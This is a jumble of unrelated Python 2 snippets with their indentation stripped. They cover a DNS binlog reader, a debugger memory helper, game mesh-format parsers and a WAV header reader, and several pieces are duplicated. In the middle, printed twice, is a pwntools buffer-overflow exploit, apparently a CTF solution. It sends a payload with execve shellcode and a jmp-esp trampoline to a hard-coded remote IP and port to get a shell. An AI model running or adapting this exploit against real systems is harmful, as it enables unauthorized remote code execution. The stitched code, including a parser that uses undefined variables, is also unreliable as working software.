def binlog_reader(fd, fields):
get_query = query_factory(fields)
buff = fd.read(-1)
offset = 0
while offset < len(buff):
length, = u("H", buff, offset)
yield get_query(offset, buff, length)
offset += length
def ReadDwordMemory(address=None):
"""
Read a dword in memory
"""
if address is None:
address = threads.GetEip()
data = ReadMemory(4, address)
return u('<I', data)[0]
def ReadDwordMemory(address=None):
"""
Read a dword in memory
"""
if address is None:
address = threads.GetEip()
data = ReadMemory(4, address)
return u('<I', data)[0]
def parse_main(s):
p = 0
while p < len(s):
id, cmpr, sz = u('HHI', s[p:p + 8])
p += 8
if id == 0x810:
pass
print(hex(id), sz)
p += sz
def query_factory(fields):
query = {
"rcode": partial(lambda packet, offset, length: u("B", packet, offset + 3)[0]),
"qtype": partial(lambda packet, offset, length: u("H", packet, offset + 4)[0]),
"timestam_usec": partial(lambda packet, offset, length: u("Q", packet, offset + 8)[0]),
"client_ip": partial(
lambda packet, offset, length: ".".join(str(x) for x in u("BBBB", packet, offset + 28))),
"profile_id": partial(lambda packet, offset, length: u("I", packet, offset + 32)[0]),
"latency_usec": partial(lambda packet, offset, length: u("I", packet, offset + 36)[0]),
"cats": partial(
lambda packet, offset, length: filter(lambda x: x != 0, u("BBBBBBBB", packet, offset + 40))),
"reserved5": partial(lambda packet, offset, length: u("I", packet, offset + 48)[0]),
"reserved6": partial(lambda packet, offset, length: u("I", packet, offset + 52)[0]),
"dname": partial(lambda packet, offset, length: "".join(u("c" * (length - 56), packet, offset + 56)))
}
if fields == ["*"]:
fields = query.keys()
new_query = {key: func for key, func in query.items() if key in fields}
return lambda offset, packet, length: {key: func(packet, offset, length) for key, func in new_query.iteritems()}
def parse_mesh(s):
p = 0
fmtVer, vCnt, tCnt = u('III', s[p:p + 12])
p += 12
bbox = u('6f', s[p:p + 24])
p += 24
verts, faces = [], []
for i in range(vCnt):
X, Y, Z = u('fff', s[p:p + 12])
p += 12
verts.append((X, Z, Y))
for i in range(tCnt):
v1, v2, v3, unknow = u('4I', s[p:p + 16])
p += 16
faces.append((v1, v3, v2))
# import bpy
# me = bpy.data.meshes.new('me')
# ob = bpy.data.objects.new('ob', me)
# me.from_pydata(verts, (), faces)
# bpy.context.scene.objects.link(ob)
# bpy.context.scene.update()
return tCnt
filename = sys.argv[1]
filePath = os.path.join(os.getcwd(),filename )
with open(filePath, 'rb') as f:
meta = dict()
tRiff = f.read(4)
f.seek(8)
tWave = f.read(4)
if tRiff != "RIFF" or tWave != "WAVE":
raise Exception("Input file not in wav format: "+ filePath )
f.seek(16)
meta['chunkSize'] = u('<I',f.read(4))[0] # <
f.seek(20)
meta['compression'] = u('<H',f.read(2))[0] # <
f.seek(22)
meta['channels'] = u('<H',f.read(2))[0] # <
f.seek(24)
meta['sampleRate'] = u('<I',f.read(4))[0] # <
f.seek(34)
meta['bitsPerSample'] = u('<H',f.read(2))[0] # <
f.seek(40)
meta['size'] = u('<I',f.read(4))[0] # >
print "\n-----------------------------------"
pprint(meta)
print "-----------------------------------\n"
from pwn import *
from struct import pack as p, unpack as u
host, port = ('130.211.202.98', 7575)
r = remote(host, port)
# prepare eip + ebp overwrite values
new_eip = p('<I', 0x0804A048) # > 0804A048 meow
new_ebp = p('<I', 0xDEADBEEF)
# prepare shellcode
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# prepare payload
payload = "B"*40 + new_ebp + new_eip + shellcode
# send payload to victim
print r.recvuntil('What\'s your name?\n')
r.sendline(payload)
print r.recvuntil('What\'s your favorite number?\n')
# construct 4-byte trampoline in meow
h = '\x90\x90\xff\xe4' # jmp esp = ff e4
trampoline = u('<i', h)
r.sendline("%d" % trampoline)
# enjoy your shell
r.interactive()
r.close()
from pwn import *
from struct import pack as p, unpack as u
host, port = ('130.211.202.98', 7575)
r = remote(host, port)
# prepare eip + ebp overwrite values
new_eip = p('<I', 0x0804A048) # > 0804A048 meow
new_ebp = p('<I', 0xDEADBEEF)
# prepare shellcode
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# prepare payload
payload = "B" * 40 + new_ebp + new_eip + shellcode
# send payload to victim
print r.recvuntil('What\'s your name?\n')
r.sendline(payload)
print r.recvuntil('What\'s your favorite number?\n')
# construct 4-byte trampoline in meow
h = '\x90\x90\xff\xe4' # jmp esp = ff e4
trampoline = u('<i', h)
r.sendline("%d" % trampoline)
# enjoy your shell
r.interactive()
r.close()
def parse_0x1(s, tCnt):
p = 0
while p < len(s):
unk = u('II6fI', s[p:p + 36])
p += 36
print(unk)
for i in range(vCnt):
X, Y, Z = u('fff', s[p:p + 12])
p += 12
verts.append((X, Z, Y))
for i in range(tCnt):
v1, v2, v3, unknow = u('4I', s[p:p + 16])
p += 16
faces.append((v1, v3, v2))
# import bpy
# me = bpy.data.meshes.new('me')
# ob = bpy.data.objects.new('ob', me)
# me.from_pydata(verts, (), faces)
# bpy.context.scene.objects.link(ob)
# bpy.context.scene.update()
return tCnt
f = open('build.cform', 'rb')
s = f.read()
f.close()
p = 0
while p < len(s):
id, sz = u('II', s[p:p + 8])
p += 8
if id == 0x0:
tCnt = parse_mesh(s[p:p + sz])
elif id == 0x1:
parse_0x1(s[p:p + sz], tCnt)
p += sz
input()
